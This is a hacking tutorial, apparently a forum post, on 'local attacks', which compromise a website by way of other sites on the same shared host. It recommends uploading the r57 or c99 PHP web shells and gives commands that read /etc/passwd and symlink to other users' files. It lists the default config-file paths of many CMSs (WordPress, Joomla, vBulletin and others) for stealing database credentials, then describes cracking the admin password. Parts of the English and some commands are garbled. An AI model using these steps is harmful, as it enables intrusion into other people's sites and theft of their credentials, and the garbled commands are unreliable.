Local Attacks
Attack A Website by Using Local Method (Local Attack)
What is Local Attack?
In generally, once we host the website to server, after that the user will be provided an " user account" and the directory/folder to mange their website. For instance, the user 1 has a website "A" and one directory/folder : /home/user1 to manage user 1. Similarly, the user 2 has a website "B" and one directory/folder /home/user2 to manage.
Local attack is the the method which is applied to hack a website in the same server. For example, I want to attack website "A" from user 1, but unfortunately I could not find out the vulnerabilities to exploit and get an lien from it, that means I have no way to attack based on this site "A". So, I will look for the websites which are being on the same server with "A", could be website "B" or "C".
Based on site "B" or "C", the both of them are getting some vulnerabilities or another words is " hackable ". After getting the authorities on those site "B" or "C", I will upload the php file named " Shell " to the server of "B" or "C" it's also the server of website "A". The hacking process is starting from now.....
Pros and Cons of Local Attack
Pros:
*This way could be the good way to attack a website through the web same server with it once we can not find any vulnerabilities to hack. *Nowadays, in order to save the money to buy the private server, the host should hire the server in which belong with other host. The Local attack should be common way.
Cons:
*The administrator could find out how the access come from *Local attack will not be successful when the targets are not being in the same server with other ones. *Demand to know enough about " shell, linux command line, website development and networking as well"
What we need to know?
Normally for web site, its data must be stored on one server (server) is always active and connected to the internet. Storage space on the server used to store the data of the website is called the host. For a number of agencies and organizations, the hired one server for data storage is not practical website. Due to their needs is simply stored, further 1 server rental price is not cheap. Therefore, shared hosting is a reasonable choice. With shared hosting, server memory space is divided into many small hosts, and are separate from each rental. So on one server will contain data for multiple websites, and there is also a source of security for developing local attack.
Decentralized system
Unlike Windows, Linux operating system has a decentralized system is complicated and strict. Linux supports three basic working :
r: read access (read)
w: right to record (write)
x: right to execute (execute)
-: not allowed
These rights are assigned to three subjects:
u: owner (owner)
g: group ownership (group)
o: the ordinary users (other)
Character One: identify the type of file.
-: regular files (text, binary, executed file)
d: folder
c / b: device file
l: file link
next 9 characters: define permissions to read, write, execute for the owner, ownership and user groups remaining.
Change group / owner: chown, chgrp Performed by root or their respective owners.
Shell
Simply put, the shell is a program that takes your commands from the keyboard and gives them to the operating system to perform. In the old days, it was the only user interface available on a Unix computer. Nowadays, we have graphical user interfaces (GUIs) in addition to command line interfaces (CLIs) such as the shell.
On most Linux systems a program called bash (which stands for Bourne Again SHell, an enhanced version of the original Bourne shell program, sh, written by Steve Bourne) acts as the shell program. There are several additional shell programs available on a typical Linux system. These include: ksh, tcsh and zsh.
In this tutorial, I will use the shell php named: Shell r57 or c99. You can download it on google
*I recommend you use those shells in virtual machines or download it as well.
How to Local attack step by step ?
1. View the list of user in server
2. Find the config.php file
3. Get the login information to database
4. Crack and change the password of admin
5. Login and upload the shell
1. View the list of user in server
If we want to local attack a website as I mentioned before, we need to know the users on the server and which sources it is? . After that , we have able to read the config.php file of the user
The command line to get the user:
Cat /etc/passwd
Some cases, If the above command line does not show the user list, we could try this:
ls -l /home/
If the server ban to cat the passwd, use could use these command lines:
Less /etc/passwd ./cat/etc/passwd More /etc/passwd
Or in some of the shell are common now which have the get user function available on there, U just need to click and view it out.
Find the path file config.php
Depending on the sources the path file will set be default like this: Note: Path is the path locates from server to the site
-With linux:
/home/user/public_html
-Vbulletin:
path/includes/config.php
-Mybb:
path/inc/config.php
-Joomla:
path/configuration.php
-Word-Press:
path/wp-config.php
-Ibp:
path/conf_global.php
-Php-fusion:
path/config.php
-Smf:
Path/Settings.php
-Nuke:
path/config.php
-Xoops:
path/mainfile.php
-Zen Cart
Path/includes/configure.php
-path/setidio:
path/datas/config.php
-Datalife Engine:
path/engine/data/config.php
-Phpbb:
Path/config.php
-Wordpress:
path/wp-config.php
-Seditio:
path/datas/config.php
-Drupal:
path/sites/default/settings.php
- Discuz
path/config/config_ucenter.php
- Bo-Blog
path/data/config.php
This is the default path for the open source code also for the site itself is still set or conventional path soon public_html directory (path / config.php) (This is mainly due to the habits of programmers ).
(To search for the source path, search by keywords: "cwd", we will see similar code: "require_once (CWD. '/includes/init.php');" - This is the path defaults resulting init.php file)) ......
Get the information from config file
This is the important part of Local attack
The basic command lines using for Local Attack
-Ls, Dir: List the names of the files inside the folder ls -al, ls -lia: List the names and attributes of files inside the folder [indent] Ls -lia "/home/lphanvan/public_html/@ender/includes.config.php"
-sand, ./cat, less, more, tail: View contents inside the file: [indent] Cat "/home/lphanvan/public_html/@endewr/includes/config.php"
-Ln: Command symbolic link: [indent] Ln -s "/home/lphanvan/public_html/@ender/includes/config.php%20ender.ini" -CD: Convert directory
For example, to navigate to the folder soleil "[indent] Cd / home / lphanvan/ public_html / @ender/ includes / itcollege
cd ~: Go to Facebook's home directory
cd -: Back both working directory
cd ..: Go to next folder outside working directory